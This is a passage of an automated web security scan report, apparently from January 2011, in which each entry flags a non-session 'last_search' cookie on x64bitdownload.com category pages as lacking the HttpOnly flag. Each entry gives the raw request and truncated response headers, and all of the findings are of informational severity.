Expires: Mon, 24 Jan 2011 15:35:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66926


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.906. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-communications-downloads-3-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:39 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.907. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:41 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79258


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.908. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81866


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.909. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.910. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52725


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.911. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76989


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.912. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78664


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.913. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44061


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.914. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81531


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.915. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.916. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-desktop-downloads-4-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.917. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-development-downloads-5-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77292


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.918. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-education-downloads-6-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74554


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.919. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-games-entertainment-downloads-7-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.920. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-graphic-apps-downloads-8-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81027


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...

14.921. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categories/free-64-bit-home-hobby-downloads-9-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:30 GMT
